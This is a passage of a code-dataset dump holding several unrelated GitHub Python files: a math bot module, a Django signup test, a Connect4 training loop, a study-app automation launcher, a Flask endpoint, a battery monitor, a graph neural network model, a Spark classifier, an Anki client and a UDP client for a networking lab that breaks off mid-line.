'.join(answers))\r\n\r\n\r\n@command('factor', __name__, help='Factor an integer into primes.',\r\n usage='')\r\ndef factorize(_):\r\n \"\"\"Wrapper for factor function.\"\"\"\r\n try:\r\n n = int(_['T'])\r\n except:\r\n pass\r\n l = factor(n) if _['rank'] else factor(n, 1e4)\r\n u = {}\r\n for x in l:\r\n if x not in u.keys():\r\n u[x] = 0\r\n u[x] += 1\r\n f = ' * '.join([str(x) + '^' + str(u[x]) for x in u.keys()]) + ' '\r\n return Message(str(n) + ' = ' + f.replace('^1 ', ' ')[:-1])\r\n\r\n\r\ndef calc(s):\r\n \"\"\"Evaluate the mathematical expression contained in a string.\"\"\"\r\n # (a)cos/sin/tan(h) atan2 degrees radoa,s\r\n # exp log log2 log10 factorial sqrt e pi floor int\r\n allowedMath = ['acos', 'acosh', 'asin', 'asinh', 'atan', 'atan2', 'atanh',\r\n 'cos', 'cosh', 'degrees', 'exp', 'factorial', 'floor',\r\n 'log', 'log2', 'log10', 'radians', 'sin', 'sinh', 'sqrt',\r\n 'tan', 'tanh', 'e', 'pi']\r\n s = s.lower()\r\n s = s.replace('^', '**')\r\n s = s.replace('int(', 'floor(')\r\n s = s.replace('π', 'pi')\r\n r, i = '', 0\r\n math.pi # dummy statement to avoid F401 (flake8)\r\n while i < len(s):\r\n c = s[i]\r\n # Supports binary (0b), octal (0o) and hexadecimal (0x)\r\n if c in ascii_lowercase and c not in 'obxacdef':\r\n func, j = c, i + 1\r\n while j < len(s) and s[j] in ascii_lowercase + digits:\r\n func += s[j]\r\n j += 1\r\n if func in allowedMath:\r\n r += 'math.' + func\r\n i = j - 1\r\n elif c not in (ascii_uppercase + '_'):\r\n r += c\r\n i += 1\r\n\r\n def calculator(expr, output):\r\n \"\"\"Append eval(expr) to list.\"\"\"\r\n try:\r\n result = eval(expr)\r\n except:\r\n result = 'ERR'\r\n output.put(result)\r\n\r\n q = multiprocessing.Queue()\r\n ev = multiprocessing.Process(target=calculator, args=(r, q))\r\n ev.start()\r\n ev.join(2)\r\n if ev.is_alive():\r\n ev.terminate()\r\n ev.join()\r\n return None\r\n else:\r\n result = q.get()\r\n if result != 'ERR':\r\n return result\r\n\r\n\r\ndef factor(n, mx=len(primes)):\r\n \"\"\"Return the prime factors of n, up to P(mx).\"\"\"\r\n if not n:\r\n return [0]\r\n l = []\r\n for p in primes[:mx]:\r\n while n % p == 0:\r\n l.append(p)\r\n n //= p\r\n if n in primes:\r\n return l + [n]\r\n if n <= primes[mx - 1] ** 2:\r\n return l + [n]\r\n return ['Over capacity']\r\n\r\n\r\ndef isPrime(n):\r\n \"\"\"Tell if n is a prime number. Return None if over capacity.\"\"\"\r\n if n in primes:\r\n return True\r\n for p in primes:\r\n if n % p == 0:\r\n return False\r\n if n > primes[-1] ** 2:\r\n return None\r\n return True\r\n\r\n\r\ndef dicho(x, l):\r\n \"\"\"Return the index of x in a sorted list, assuming x is present once.\"\"\"\r\n a, b = 0, len(l)\r\n while l[a] != x and l[b] != x:\r\n m = (a + b) // 2\r\n n = l[m]\r\n if x < n:\r\n b = m\r\n elif x > n:\r\n a = m\r\n else:\r\n return m\r\n return a if l[a] == x else b\r\n","repo_name":"Zeroji/semicold","sub_path":"math_.py","file_name":"math_.py","file_ext":"py","file_size_in_byte":6025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"27935322507","text":"\"\"\" Tests for signup page. \"\"\"\n\nimport json\nimport logging\nfrom mock import patch, Mock\nfrom django.test import TestCase, Client\nfrom utils.exception import AppMessage\nfrom utils.data import SIGNUP_DATA\nfrom custom_user.views.views_accounts import UserSignup\nfrom custom_user.models import CustomUser\nfrom unittest.mock import MagicMock\nfrom django.http import HttpRequest\n\n\nLOGGER = logging.getLogger(__name__)\n\n\nclass TestSignup(TestCase):\n \"\"\" Unit test cases for signup page. \"\"\"\n\n def setUp(self):\n \"\"\"Test cases setUp for class TestSignup. \"\"\"\n\n self.client = Client()\n self.url = '/accounts/signup/'\n self.payload = SIGNUP_DATA\n\n self.request = HttpRequest()\n\n def tearDown(self):\n CustomUser.objects.all().delete()\n\n def test_signup_without_ajax_call(self):\n \"\"\"Tests if submit form without ajax call. \"\"\"\n\n request = self.client.post(self.url, {})\n response = json.loads(request.content.decode())\n assert response['result'] is False\n assert response['message'] == AppMessage.error['INVALID_REQUEST']\n\n def test_signup_with_invalid_email(self):\n \"\"\"Tests signup page with email is invalid. \"\"\"\n self.payload['email'] = ''\n request = self.client.post(self.url, self.payload,\n HTTP_X_REQUESTED_WITH='XMLHttpRequest')\n response = json.loads(request.content.decode())\n assert response['result'] is False\n assert response['email'][0] == 'This field is required.'\n\n @patch('utils.common.Email.go_email')\n def test_mock_email_for_user_signup(self, mock_email):\n \"\"\"Mocks email function when registering a user. \"\"\"\n self.request.__setattr__('HTTP_X_REQUESTED_WITH', 'XMLHttpRequest')\n self.request.__setattr__('method', 'POST')\n self.request.is_ajax = MagicMock(return_value=True)\n self.request.POST.update(self.payload)\n\n # view\n view = UserSignup()\n view.request = self.request\n mock_email.return_value = True\n response = view.post(self.request)\n content = json.loads(response.content.decode())\n\n assert response.status_code == 201\n assert content['result'] is True\n assert content['message'] == AppMessage.success['SIGNUP_SUCCESS']\n","repo_name":"atanudey/faradayfinder","sub_path":"tests/unit_tests/test_signup.py","file_name":"test_signup.py","file_ext":"py","file_size_in_byte":2308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42972769423","text":"import numpy as np\nimport random, sys\n\ndef playTrainingGames(n, game, model, opponent, discountFactor=0.9, exploit=1):\n '''\n Plays n games between model and opponent. \\n\n Returns the data of all the games which can be used for training. \\n \n \n exploit -- The chance of selecting chosen move (complement of selecting random move)\n '''\n\n # Each move in each game adds an element to these arrays\n states = [] # A state\n actions = [] # Index of action made from state\n sPrimes = [] # The resultant state of each state-action pair \n qValues = [] # These are discarded after network is trained once\n\n # One element per game is added to this array\n winners = []\n\n for k in range(n):\n\n while True:\n if game.turn == 1:\n\n move = game.getMove(model, exploit)\n winner = game.move(move[\"move\"])\n\n # Add state-action pair to memory\n states.append(move[\"state\"])\n actions.append(move[\"move\"])\n\n # Add qValue for next move to memory\n if game.turnNum > 1:\n qValues.append(\n move[\"qValue\"] * discountFactor\n )\n\n # Append the resultant state from the previous move\n sPrimes.append(move[\"state\"])\n \n else:\n winner = opponent.playMove()\n\n if winner != None:\n if winner == 1:\n qValues.append(np.array([1]))\n sPrimes.append(1)\n # winMoves += [1]*(len(saPairs)-len(winMoves))\n else:\n qValues.append(np.array([0]))\n sPrimes.append(0)\n # winMoves += [0]*(len(saPairs)-len(winMoves))\n break\n\n winners.append(winner)\n\n\n # sys.exit()\n\n # game.printGame()\n # print(\"winner #{}: {}\".format(k, winner))\n print(\"Game #{}/{}\".format(k+1,n), end='\\r')\n\n game.resetGame()\n\n return {\n \"states\": np.array(states),\n \"actions\": np.array(actions),\n \"sPrimes\": np.array(sPrimes),\n \"qValues\": np.array(qValues),\n # \"winMoves\": np.array(winMoves), # The predicted values for winning by playing each move\n \"winners\": winners\n }\n","repo_name":"mattyhempstead/tensorflow-experiments","sub_path":"connect4/v5/playTrainingGames.py","file_name":"playTrainingGames.py","file_ext":"py","file_size_in_byte":2385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"37741682543","text":"import math\nimport os\nimport sys\nimport time\nfrom sys import argv\n\nfrom pdlearn import boot\n\nboot.check_environment()\ntry:\n # 在此处导入所有 pdlearn 内的模块\n from pdlearn import globalvar as gl\n from pdlearn import color, score, threads, user, version\n from pdlearn.answer_question import daily, weekly, zhuanxiang\n from pdlearn.article_video import article, video\n from pdlearn.config import cfg_get\n from pdlearn.mydriver import Mydriver\n from pdlearn.score import show_score, show_scorePush\nexcept ImportError as e:\n boot.try_pip_install(exception=e)\n\n\ndef get_argv():\n if gl.is_init != True:\n gl.init_global()\n if len(argv) > 2:\n if argv[2] == \"hidden\":\n gl.nohead = True\n elif argv[2] == \"show\":\n gl.nohead = False\n if len(argv) > 3:\n if argv[3] == \"single\":\n gl.lock = True\n elif argv[3] == \"multithread\":\n gl.lock = False\n if len(argv) > 4:\n if argv[4].isdigit():\n gl.stime = argv[4]\n return gl.nohead, gl.lock, gl.stime, gl.single\n\n\ndef start_learn(uid, name):\n # 0 读取版本信息\n start_time = time.time()\n nohead, lock, stime, Single = get_argv()\n print(\"是否无头模式:{0} {1}\".format(nohead, os.getenv('Nohead')))\n cookies = user.get_cookie(uid)\n if nohead == True:\n TechXueXi_mode = \"3\"\n else:\n TechXueXi_mode = str(cfg_get(\"base.ModeType\", 3))\n print(\"当前选择模式:\" + TechXueXi_mode + \"\\n\" + \"=\" * 60)\n\n if not name:\n user_fullname = user.get_fullname(uid)\n name = user_fullname.split('_', 1)[1]\n else:\n user_fullname = uid+\"_\"+name\n\n if not cookies or TechXueXi_mode == \"0\":\n msg = \"\"\n if name == \"新用户\":\n msg = \"需要增加新用户,请扫码登录,否则请无视\"\n else:\n msg = name+\" 登录信息失效,请重新扫码\"\n # print(msg)\n gl.pushprint(msg, chat_id=uid)\n if gl.pushmode == \"6\":\n gl.pushprint(\"web模式跳过自动获取二维码,请手动点击添加按钮\", chat_id=uid)\n print(color.red(\"【#️⃣】 若直接退出请运行:webserverListener.py\"))\n return\n driver_login = Mydriver()\n cookies = driver_login.login()\n driver_login.quit()\n # cookies = login()\n if not cookies:\n print(\"登录超时\")\n return\n user.save_cookies(cookies)\n uid = user.get_userId(cookies)\n user_fullname = user.get_fullname(uid)\n name = user_fullname.split('_', 1)[1]\n user.update_last_user(uid)\n output = name + \" 登录正常,开始学习...\\n\"\n\n article_index = user.get_article_index(uid)\n video_index = 1 # user.get_video_index(uid)\n\n total, scores = show_score(cookies)\n gl.pushprint(output, chat_id=uid)\n if TechXueXi_mode in [\"1\", \"3\"]:\n\n article_thread = threads.MyThread(\n \"文章学 xi \", article, uid, cookies, article_index, scores, lock=lock)\n video_thread = threads.MyThread(\n \"视频学 xi \", video, uid, cookies, video_index, scores, lock=lock)\n article_thread.start()\n video_thread.start()\n article_thread.join()\n video_thread.join()\n if TechXueXi_mode in [\"2\", \"3\"]:\n# print('开始每日答题……')\n# daily(cookies, scores)\n print('开始每周答题……')\n weekly(cookies, scores)\n if nohead != True or gl.zhuanxiang == True:\n print('开始专项答题……')\n zhuanxiang(cookies, scores)\n\n if TechXueXi_mode == \"4\":\n user.select_user()\n if TechXueXi_mode == \"5\":\n user.refresh_all_cookies(display_score=True)\n if TechXueXi_mode == \"6\":\n user.refresh_all_cookies(live_time=11.90)\n\n seconds_used = int(time.time() - start_time)\n gl.pushprint(name+\" 总计用时 \" + str(math.floor(seconds_used / 60)) +\n \" 分 \" + str(seconds_used % 60) + \" 秒\", chat_id=uid)\n show_scorePush(cookies, chat_id=uid)\n try:\n user.shutdown(stime)\n except Exception as e:\n pass\n\n\ndef start(nick_name=None):\n nohead, lock, stime, Single = get_argv()\n info_shread = threads.MyThread(\"获取更新信息...\", version.up_info)\n info_shread.start()\n user_list = user.list_user(printing=False)\n user.refresh_all_cookies()\n if len(user_list) == 0:\n user_list.append([\"\", \"新用户\"])\n for i in range(len(user_list)):\n try:\n if nick_name is None or nick_name == user_list[i][1] or nick_name == user_list[i][0]:\n _learn = threads.MyThread(\n user_list[i][0]+\"开始学xi\", start_learn, user_list[i][0], user_list[i][1], lock=Single)\n _learn.start()\n except:\n gl.pushprint(\"学习页面崩溃,学习终止\")\n\n\ndef get_my_score(uid):\n get_argv()\n user.refresh_all_cookies()\n cookies = user.get_cookie(uid)\n if not cookies:\n return False\n show_scorePush(cookies, chat_id=uid)\n return True\n\n\ndef get_user_list():\n get_argv()\n dic = user.refresh_all_cookies(display_score=True)\n values = dic.values()\n msg = \"\"\n for v in values:\n msg += v+\"\\n\"\n if msg == \"\":\n msg = \"cookie全部过期,请重新登录\"\n return msg\n\n\ndef get_all_user_name():\n user_list = user.list_user(printing=False)\n names = []\n for i in range(len(user_list)):\n names.append(user_list[i][1])\n return names\n\n\ndef add_user(chat_id=None):\n get_argv()\n gl.pushprint(\"请登录(登录方式请仔细阅读文档,如果觉得这是让你下载,就是你没仔细读文档):\", chat_id=chat_id)\n driver_login = Mydriver()\n cookies = driver_login.login(chat_id)\n driver_login.quit()\n # cookies = login(chat_id=chat_id)\n if not cookies:\n gl.pushprint(\"登录超时。\", chat_id=chat_id)\n return\n user.save_cookies(cookies)\n uid = user.get_userId(cookies)\n user_fullname = user.get_fullname(uid)\n user.update_last_user(uid)\n gl.pushprint(user_fullname+\"登录成功\", chat_id=chat_id)\n\n\nif __name__ == '__main__':\n if(cfg_get('display.banner') != False): # banner文本直接硬编码,不要放在conf中\n print(\"=\" * 60 +\n '\\n 我们的网站,GitHub 等页面已经被中国大陆的浏览器加入黑名单,请用谷歌浏览器 chrome 打开我们的站点。' +\n '\\n 科技强 guo 官方网站:https://techxuexi.js.org' +\n '\\n Github地址:https://github.com/TechXueXi' +\n '\\n使用本项目,必须接受以下内容,否则请立即退出:' +\n '\\n - TechXueXi 仅额外提供给“爱党爱 guo ”且“工作学业繁重”的人' +\n '\\n - 项目开源协议 LGPL-3.0' +\n '\\n - 不得利用本项目盈利' +\n '\\n另外,我们建议你参与一个维护劳动法的项目:' +\n '\\nhttps://996.icu/ 或 https://github.com/996icu/996.ICU/blob/master/README_CN.md')\n print(\"=\" * 60, '''\\nTechXueXi 现支持以下模式(答题时请值守电脑旁处理少部分不正常的题目):''')\n print(cfg_get('base.ModeText', \"\") + '\\n' + \"=\" * 60)\n # 模式提示文字请在 ./config/default_template.conf 处修改。\n start()\n","repo_name":"TechXueXi/TechXueXi","sub_path":"SourcePackages/pandalearning.py","file_name":"pandalearning.py","file_ext":"py","file_size_in_byte":7445,"program_lang":"python","lang":"en","doc_type":"code","stars":5402,"dataset":"github-code","pt":"32"} +{"seq_id":"26476971291","text":"from flask_apispec import MethodResource\nfrom flask_apispec import use_kwargs, doc\nfrom flask_jwt_extended import fresh_jwt_required\nfrom flask_restful import Resource\nfrom webargs import fields, validate\nfrom decorator.verify_admin_access import verify_admin_access\n\nfrom db.db import DB\nfrom decorator.catch_exception import catch_exception\nfrom decorator.log_request import log_request\nfrom utils.serializer import Serializer\n\n\nclass GetCampaigns(MethodResource, Resource):\n\n def __init__(self, db: DB):\n self.db = db\n\n @log_request\n @doc(tags=['campaign'],\n description='Get campaigns',\n responses={\n \"200\": {},\n })\n @use_kwargs({\n 'page': fields.Int(required=False, missing=1, validate=validate.Range(min=1)),\n 'per_page': fields.Int(required=False, missing=50, validate=validate.Range(min=1, max=50)),\n }, location=\"query\")\n @fresh_jwt_required\n @verify_admin_access\n @catch_exception\n def get(self, **kwargs):\n\n query = self.db.session \\\n .query(self.db.tables[\"Campaign\"]) \\\n .order_by(self.db.tables[\"Campaign\"].id.desc())\n paginate = query.paginate(kwargs['page'], kwargs['per_page'])\n campaigns = Serializer.serialize(paginate.items, self.db.tables[\"Campaign\"])\n\n return {\n \"pagination\": {\n \"page\": kwargs['page'],\n \"pages\": paginate.pages,\n \"per_page\": kwargs['per_page'],\n \"total\": paginate.total,\n },\n \"items\": campaigns,\n }, \"200 \"\n","repo_name":"CybersecurityLuxembourg/openxeco-core","sub_path":"oxe-api/resource/campaign/get_campaigns.py","file_name":"get_campaigns.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"11949806427","text":"import smbus\nimport time\nimport sys\nfrom ina219 import INA219\n\nclass PowerFormatting:\n FULL = 0x01\n SHORT = 0x02\n PERCENT = 0x03\n CURRENT = 0x04\n\ndef read(ina219, parameter):\n\n voltage = ina219.getBusVoltage_V() # voltage on V- (load side)\n shunt_voltage = ina219.getShuntVoltage_mV() / 1000 # voltage between V+ and V- across the shunt\n current = ina219.getCurrent_mA() # current in mA\n power = ina219.getPower_W() # power in W\n percent = (voltage - 6)/2.4*100\n if(percent > 100):percent = 100\n if(percent < 0):percent = 0\n result = \"\"\n if(PowerFormatting.FULL == parameter):\n result = printlong(voltage, current, power, percent)\n elif(PowerFormatting.SHORT == parameter):\n result = printshort(voltage, current, power, percent)\n elif(PowerFormatting.PERCENT == parameter):\n result = \"{0}\".format(int(percent))\n elif(PowerFormatting.CURRENT == parameter):\n result = \"{0}\".format(int(current))\n return result\n\ndef printlong(voltage, current, power, percent):\n discharge = \"\"\n if(current < 0):\n discharge = \"dis\"\n print(\"Load Voltage:\\t\\t{:6.3f} V\".format(voltage))\n print(\"Battery {0}charging\\t{1:9.6f} A\".format(discharge, current/1000))\n print(\"Power:\\t\\t\\t{:6.3f} W\".format(power))\n print(\"Percent:\\t\\t{:3.1f}%\".format(percent))\n return \"\"\n\ndef printshort(voltage, current, power, percent):\n return \"{0},{1},{2:1.3f},{3}\".format(int(voltage*100), int(current), power, int(percent))\n\nif __name__=='__main__':\n ina219 = INA219(addr=0x42)\n read(ina219, 0)\n time.sleep(2)\n if(len(sys.argv) > 1):\n result = \"\"\n if(sys.argv[1] == \"percent\"):\n result = read(ina219, PowerFormatting.PERCENT)\n elif(sys.argv[1] == \"current\"):\n result = read(ina219, PowerFormatting.CURRENT)\n else:\n result = read(ina219, PowerFormatting.SHORT)\n print(result)\n else:\n read(ina219, PowerFormatting.FULL)\n","repo_name":"jscoobyced/raspi-utils","sub_path":"ina219/powerlog.py","file_name":"powerlog.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"24293350430","text":"import torch.nn as nn\nimport torch.nn.functional as F\nfrom torch_geometric.nn import GCNConv, NNConv, GINConv, GATConv, global_add_pool, Set2Set\n\n\nclass GCN(nn.Module):\n def __init__(self, n_features, hidden_dim, n_classes, n_conv_layers=3, dropout=0,\n conv_type=\"MPNN\", set2set_pooling=False, node_classification=True, softmax=False,\n probability=True, batch_norm=True, num_embeddings=None, embedding_dim=20,\n residuals=False, device=\"cpu\"):\n super(GCN, self).__init__()\n if num_embeddings:\n self.embedding = nn.Embedding(num_embeddings=num_embeddings, embedding_dim=embedding_dim)\n\n self.convs = nn.ModuleList()\n self.batch_norms = nn.ModuleList()\n\n # First layer\n self.convs.append(self.get_conv_layer(n_features, hidden_dim, conv_type=conv_type))\n self.batch_norms.append(nn.BatchNorm1d(hidden_dim))\n\n # Hidden layers\n for i in range(n_conv_layers - 1):\n self.convs.append(self.get_conv_layer(hidden_dim, hidden_dim, conv_type=conv_type))\n self.batch_norms.append(nn.BatchNorm1d(hidden_dim))\n\n # Fully connected layer\n self.fc = nn.Linear(hidden_dim, n_classes)\n\n # if residuals:\n # self.fc = nn.Linear(n_conv_layers * hidden_dim, n_classes)\n\n # If we are interested in graph classification, we introduce the final pooling and change\n # the fc layer to have dimensions compatible with the output of the Set2Set model\n if set2set_pooling:\n self.fc = nn.Linear(2 * hidden_dim, n_classes)\n self.pooling = Set2Set(hidden_dim, processing_steps=10)\n\n self.dropout = nn.Dropout(dropout)\n\n self.conv_type = conv_type\n self.node_classification = node_classification\n self.softmax = softmax\n self.probability = probability\n self.batch_norm = batch_norm\n self.num_embeddings = num_embeddings\n self.set2set_pooling = set2set_pooling\n self.residuals = residuals\n self.device = device\n\n def forward(self, data):\n x, adj, edge_attr, batch = data.x, data.edge_index, data.edge_attr, data.batch\n # poolings = torch.Tensor([]).to(self.device)\n\n if self.num_embeddings:\n x = self.embedding(x)\n x = self.dropout(x)\n\n # Apply graph convolutional layers\n for i, conv in enumerate(self.convs):\n x = self.apply_conv_layer(conv, x, adj, edge_attr, conv_type=self.conv_type)\n x = self.batch_norms[i](x) if self.batch_norm else x\n x = nn.functional.leaky_relu(x)\n x = self.dropout(x)\n\n # if self.residuals:\n # poolings = torch.cat((poolings, global_add_pool(x, batch)), dim=1)\n\n # If we are interested in graph classification, apply graph-wise pooling\n if not self.node_classification: # and not self.residuals:\n if self.set2set_pooling:\n x = self.pooling(x, batch)\n else:\n x = global_add_pool(x, batch)\n x = self.dropout(x)\n\n # if self.residuals:\n # x = self.dropout(poolings)\n\n x = self.fc(x)\n\n # if not self.node_classification:\n # if self.probability:\n # return torch.sigmoid(x)\n # else:\n # return x\n\n return F.log_softmax(x, dim=1) if not self.softmax else F.softmax(x, dim=1)\n\n @staticmethod\n def get_conv_layer(n_input_features, n_output_features, conv_type=\"GCN\"):\n if conv_type == \"GCN\":\n return GCNConv(n_input_features, n_output_features)\n elif conv_type == \"GAT\":\n return GATConv(n_input_features, n_output_features)\n elif conv_type == \"MPNN\":\n net = nn.Sequential(nn.Linear(2, 10), nn.ReLU(), nn.Linear(10, n_input_features *\n n_output_features))\n return NNConv(n_input_features, n_output_features, net)\n elif conv_type == \"GIN\":\n net = nn.Sequential(nn.Linear(n_input_features, n_output_features), nn.ReLU(),\n nn.Linear(n_output_features, n_output_features))\n return GINConv(net)\n else:\n raise Exception(\"{} convolutional layer is not supported.\".format(conv_type))\n\n @staticmethod\n def apply_conv_layer(conv, x, adj, edge_attr, conv_type=\"GCN\"):\n if conv_type in [\"GCN\", \"GAT\", \"GIN\"]:\n return conv(x, adj)\n elif conv_type in [\"MPNN\"]:\n return conv(x, adj, edge_attr)\n else:\n raise Exception(\"{} convolutional layer is not supported.\".format(conv_type))\n","repo_name":"emalgorithm/ncRNA-family-prediction","sub_path":"src/model/gcn.py","file_name":"gcn.py","file_ext":"py","file_size_in_byte":4714,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"32"} +{"seq_id":"40380704435","text":"from datetime import timedelta\n\nfrom django.urls import path\n\nfrom .base import DomainEmailValidator\nfrom .external import ExternalLoginView, ExternalGetCodeView\n\n\nclass LoginView(ExternalLoginView):\n template_context = {'provider_name': '浙江大学'}\n provider = 'zju'\n group = 'zju'\n\n\nclass GetCodeView(ExternalGetCodeView):\n provider = 'zju'\n duration = timedelta(hours=1)\n validate_identity = DomainEmailValidator('zju.edu.cn')\n\n\nurlpatterns = [\n path('zju/login/', LoginView.as_view()),\n path('zju/get_code/', GetCodeView.as_view()),\n]\n","repo_name":"SUSTech-CRA/ustc-hackergame","sub_path":"frontend/auth_providers/zju.py","file_name":"zju.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"} +{"seq_id":"42914439558","text":"import json\nimport urllib.request\nfrom typing import Any\nfrom urllib.error import URLError\n\nfrom .utils import error\n\n\nclass AnkiConnect:\n @classmethod\n def find_notes(cls, query: str) -> list[int]:\n return cls._invoke(\"findNotes\", query=query)\n\n @classmethod\n def selected_notes(cls) -> list[int]:\n return cls._invoke(\"guiSelectedNotes\")\n\n @classmethod\n def notes_info(cls, note_ids: list[int]) -> list[dict[str, Any]]:\n return cls._invoke(\"notesInfo\", notes=note_ids)\n\n @classmethod\n def update_note_fields(cls, id: int, fields: dict[str, str]) -> None:\n cls._invoke(\"updateNoteFields\", note=dict(id=id, fields=fields))\n\n @classmethod\n def get_field(cls, note_info: dict[str, Any], field: str) -> str:\n return note_info[\"fields\"][field][\"value\"]\n\n @classmethod\n def update_fields(\n cls,\n note_info: dict[str, Any],\n fields: dict[str, str],\n ) -> bool:\n to_update = {\n k: v for k, v in fields.items() if note_info[\"fields\"][k][\"value\"] != v\n }\n if to_update:\n cls.update_note_fields(note_info[\"noteId\"], fields)\n return True\n return False\n\n @classmethod\n def add_note(cls, deck_name: str, model_name: str, fields: dict[str, str]) -> None:\n result = cls._invoke(\n \"addNote\",\n note=dict(\n deckName=deck_name,\n modelName=model_name,\n fields=fields,\n options=dict(\n allowDuplicate=False,\n duplicateScope=\"deck\",\n duplicateScopeOptions=dict(\n deckName=deck_name, checkAllModels=False\n ),\n ),\n ),\n )\n if not result:\n raise Exception(f\"Could not create card with fields {fields}.\")\n\n @staticmethod\n def _invoke(action: str, **params: Any) -> Any:\n request_json = json.dumps(dict(action=action, params=params, version=6)).encode(\n \"utf-8\"\n )\n try:\n response = json.load(\n urllib.request.urlopen(\n urllib.request.Request(\"http://localhost:8765\", request_json)\n )\n )\n except URLError:\n error(\"Could not open Anki Connect URL. Is Anki running?\")\n if len(response) != 2:\n error(\"Response has an unexpected number of fields\")\n if \"error\" not in response:\n error(\"Response is missing required error field\")\n if \"result\" not in response:\n error(\"Response is missing required result field\")\n if response[\"error\"] is not None:\n error(response[\"error\"])\n return response[\"result\"]\n","repo_name":"m09/lkdlt","sub_path":"lkdlt/anki_connect.py","file_name":"anki_connect.py","file_ext":"py","file_size_in_byte":2771,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"10251181893","text":"from pyspark.ml import Pipeline\nfrom pyspark.ml.classification import RandomForestClassifier\nfrom pyspark.ml.feature import IndexToString, StringIndexer, VectorIndexer\nfrom pyspark.ml.evaluation import MulticlassClassificationEvaluator\nsepsisf = sqlContext.read.format('csv').options(header='true', inferSchema='true').load('sepsis_f.csv')\n(trainingData, testData) = sepsisf.randomSplit([0.7, 0.3])\nlabelIndexer = StringIndexer(inputCol=\"infxnqsofa\", outputCol=\"label\").fit(sepsisf)\nfrom pyspark.ml.feature import VectorAssembler\nvecAssembler = VectorAssembler(inputCols=[\"sepsis_antibiotic\",\"antibiotic\",\"RACE_NUM\",\"ETH_NUM\",\"SEXNUM\",\"icd_ind\",\"icd_rank\",\"sepsis_glucocorticoid\",\"treatment_limit\",\"icd9_477_x\",\"icd9_493_x\",\"age_at_enc\",\"icd9_691_x\",\"temp\",\"biologicals\",\"icd9_995_3\",\"bmi\",\"pain_scale\",\"dnr\",\"dnr_treatment_limit\",\"staph\",\"immunosupp_medname\",\"dncpr_dni\",\"icd9_558_3\",\"albuterol\",\"avpu\",\"avpu_old\",\"dnr_dni\",\"immunosupp_class30\"],outputCol = \"features\")\nlabelConverter = IndexToString(inputCol=\"prediction\", outputCol=\"predictedLabel\", labels=labelIndexer.labels)\nrf = RandomForestClassifier(labelCol=\"label\", featuresCol=\"features\", numTrees=10)\npipeline = Pipeline(stages=[labelIndexer, vecAssembler, rf, labelConverter])\nmodel = pipeline.fit(trainingData)\npredictions = model.transform(testData)\npredictions.select(\"predictedLabel\", \"label\", \"features\").show(5)\nevaluator = MulticlassClassificationEvaluator(\n labelCol=\"label\", predictionCol=\"prediction\", metricName=\"accuracy\")\naccuracy = evaluator.evaluate(predictions)\nprint(accuracy)\n#0.989923015099\nevaluator = MulticlassClassificationEvaluator(\n labelCol=\"label\", predictionCol=\"prediction\", metricName=\"f1\")\nf1 = evaluator.evaluate(predictions)\nprint(f1)\n#0.984910037612\nevaluator = MulticlassClassificationEvaluator(\n labelCol=\"label\", predictionCol=\"prediction\", metricName=\"weightedPrecision\")\nwp = evaluator.evaluate(predictions)\nprint(wp)\n#0.979947575823\n","repo_name":"CHABOBO/251project","sub_path":"Code/Random_Forest.py","file_name":"Random_Forest.py","file_ext":"py","file_size_in_byte":1946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9357910905","text":"import socket\nimport random\nimport logging\nfrom timeit import default_timer\n\n# To setup the server we do the following\n# 1. SSH via 'ssh -X np14@149.171.36.192'\n# 2. Login via our password\n# 3. Run the command '4123-server -address 0.0.0.0 -port 8319 -file message.txt'\n\nclass RealSnooper:\n def __init__(self, SERVER_IP_ADDR=\"149.171.36.192\", SERVER_PORT=8319):\n self.SERVER_IP_ADDR = SERVER_IP_ADDR\n self.SERVER_PORT = SERVER_PORT\n\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n self.sock.settimeout(2)\n\n self.logger = logging.getLogger(__name__)\n\n self.sock.connect((self.SERVER_IP_ADDR, self.SERVER_PORT))\n \n def settimeout(self, *args, **kwargs):\n self.sock.settimeout(*args, **kwargs)\n \n def close(self):\n self.sock.close()\n \n def _fetch_message(self, Pr, time_sent):\n # run through responses until we get our desired packet\n # duplication or packet losses can occur, which causes this to go out of sync\n msg_id = None\n\n while True: \n try:\n data = self.sock.recv(1024)\n\n # check if last packet contained correct Pr\n try:\n Pt, msg_id, msg = self.decode_packet_response(data)\n except ValueError:\n self.logger.error(f\"Failed to decode packet: len={len(data)} content={data}\")\n raise socket.timeout()\n\n if Pt == Pr:\n break\n except socket.timeout as ex:\n if msg_id is not None:\n self.logger.warning(f\"Timeout with mismatching Pr (sent {Pr}, got {Pt})\")\n else:\n self.logger.warning(f\"Timeout without reply\")\n raise ex\n \n assert Pr == Pt\n\n time_gotten = default_timer()\n rtt = time_gotten - time_sent\n self.logger.debug(f\"Matching reply rtt={rtt*1000:.0f}ms (sent {Pr}, got {Pt})\")\n return (msg_id, msg)\n \n # get a message from the server with our desired Sr \n def get_message(self, Sr, Pr=None, return_callback=False):\n if Pr is None:\n Pr = random.randint(1, 1 << 31)\n\n datagram = self.construct_packet_request(Sr, Pr)\n # self.sock.sendto(datagram, (self.SERVER_IP_ADDR, self.SERVER_PORT))\n \n time_sent = default_timer()\n self.sock.send(datagram)\n\n if not return_callback:\n return self._fetch_message(Pr, time_sent)\n \n def callback():\n return self._fetch_message(Pr, time_sent)\n\n return callback\n\n\n def construct_packet_request(self, Sr, Pr):\n return Sr.to_bytes(4, byteorder=\"big\") + Pr.to_bytes(4, byteorder=\"big\")\n\n def decode_packet_response(self, data):\n Pt = int(data[:4].hex(), 16)\n msg_id = int(data[4:8].hex(), 16)\n msg = data[8:]\n return (Pt, msg_id, 